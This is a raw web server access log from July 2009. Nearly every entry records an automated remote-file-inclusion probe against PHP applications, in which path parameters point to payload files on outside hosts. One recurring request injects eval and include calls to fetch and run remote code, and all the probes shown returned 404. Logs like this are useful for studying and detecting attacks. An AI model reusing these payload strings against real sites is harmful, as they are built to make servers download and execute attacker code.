217.147.29.190 - - [04/Jul/2009:09:10:12 -0700] "GET /logs/access_090517.log%20%20//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.179.130 - - [04/Jul/2009:09:10:49 -0700] "GET /logs/access.log%20/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.106.179.130 - - [04/Jul/2009:09:10:49 -0700] "GET /phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.106.179.130 - - [04/Jul/2009:09:10:49 -0700] "GET /logs/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:12:14 -0700] "GET /logs/access_090528.log%20%20//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:12:19 -0700] "GET /logs/access_090528.log%20%20//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:13:42 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:13:42 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:13:42 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:13:46 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:13:46 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:13:47 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:15:12 -0700] "GET /logs/access_090414.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:15:17 -0700] "GET /logs/access_090414.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.217.247.246 - - [04/Jul/2009:09:17:35 -0700] "GET /xxx/ HTTP/1.0" 200 646 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Iceweasel/2.0 (Debian-2.0+dfsg-1)" "www.americanboyschoir.com"
62.217.247.247 - - [04/Jul/2009:09:17:39 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Iceweasel/2.0 (Debian-2.0+dfsg-1)" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:21:26 -0700] "GET /logs/access.log//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.118.116.55 - - [04/Jul/2009:09:21:42 -0700] "GET /bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.118.116.55 - - [04/Jul/2009:09:21:42 -0700] "GET /logs/access_090626.log%20%20//bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.118.116.55 - - [04/Jul/2009:09:21:43 -0700] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.118.116.55 - - [04/Jul/2009:09:21:56 -0700] "GET /logs/access.log%20%20//bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.125.38.117 - - [04/Jul/2009:09:21:58 -0700] "GET /poll/booth.php?include_path=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:23:47 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:23:47 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:23:47 -0700] "GET /include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.125.38.117 - - [04/Jul/2009:09:24:12 -0700] "GET /poll/booth.php?include_path=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:24:25 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:24:25 -0700] "GET /include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:24:25 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:24:45 -0700] "GET /include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:24:45 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:24:45 -0700] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:09:24:45 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:09:24:45 -0700] "GET /logs/access_090103.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:09:24:45 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:09:24:53 -0700] "GET /logs/access_090103.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:09:24:53 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:09:24:53 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:24:56 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:28:09 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:28:37 -0700] "GET /logs/access_090629.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:28:41 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:29:05 -0700] "GET /logs/access_090629.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.115.58.73 - - [04/Jul/2009:09:29:08 -0700] "GET /logs/access_090629.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.115.58.73 - - [04/Jul/2009:09:29:08 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.115.58.73 - - [04/Jul/2009:09:29:08 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.97.221.30 - - [04/Jul/2009:09:29:42 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.nadielotiene.es//cache/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.97.221.30 - - [04/Jul/2009:09:29:42 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.nadielotiene.es//cache/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.97.221.30 - - [04/Jul/2009:09:29:42 -0700] "GET /logs/access_090517.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.nadielotiene.es//cache/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:30:50 -0700] "GET /_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:30:50 -0700] "GET /logs/access_090626.log//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:30:50 -0700] "GET /logs//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
77.221.130.17 - - [04/Jul/2009:09:31:30 -0700] "GET /logs//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.221.130.17 - - [04/Jul/2009:09:31:30 -0700] "GET /logs/access.log%20%20//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.221.130.17 - - [04/Jul/2009:09:31:30 -0700] "GET /standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:32:15 -0700] "GET /logs/access_090626.log//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:32:15 -0700] "GET /logs//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:32:16 -0700] "GET /_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.38.136.16 - - [04/Jul/2009:09:32:25 -0700] "GET /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:09:32:52 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:09:32:52 -0700] "GET /logs/access_090414.log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:09:32:53 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:09:32:57 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:09:32:58 -0700] "GET /logs/access_090414.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:09:32:58 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:09:32:58 -0700] "GET /logs/access_090528.log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.115.58.73 - - [04/Jul/2009:09:33:23 -0700] "GET /logs/access_090629.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.115.58.73 - - [04/Jul/2009:09:33:23 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.115.58.73 - - [04/Jul/2009:09:33:23 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:09:33:40 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:09:33:40 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:09:33:40 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:09:33:40 -0700] "GET /logs/access_090414.log%20%20/modules/My_eGallery/index.php?basepath=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:09:33:40 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:09:33:40 -0700] "GET /logs/access_090414.log%20%20/modules/My_eGallery/index.php?basepath=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.221.130.17 - - [04/Jul/2009:09:34:58 -0700] "GET /logs/access_090629.log//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:09:35:36 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:09:35:36 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:09:35:36 -0700] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:09:35:37 -0700] "GET /logs/access_090629.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.221.130.17 - - [04/Jul/2009:09:35:46 -0700] "GET /logs/access.log//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:37:10 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:37:10 -0700] "GET /logs/access_090603.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:37:10 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:37:12 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:37:12 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:37:12 -0700] "GET /logs/access_090603.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:09:37:26 -0700] "GET /logs/access_090517.log%20%20/modules/My_eGallery/index.php?basepath=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:09:37:26 -0700] "GET /logs/access_090517.log%20%20/modules/My_eGallery/index.php?basepath=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.115.58.73 - - [04/Jul/2009:09:37:31 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.221.130.17 - - [04/Jul/2009:09:37:46 -0700] "GET /logs/access_090612.log//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:38:14 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:38:20 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.118.116.55 - - [04/Jul/2009:09:38:26 -0700] "GET /logs/access_090626.log//bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:38:40 -0700] "GET /logs/access_090603.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:38:41 -0700] "GET /logs/access_090603.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.118.116.55 - - [04/Jul/2009:09:38:42 -0700] "GET /logs/access.log//bbs//skin/zero_vote/error.php?dir=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:38:48 -0700] "GET /logs/access_090414.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
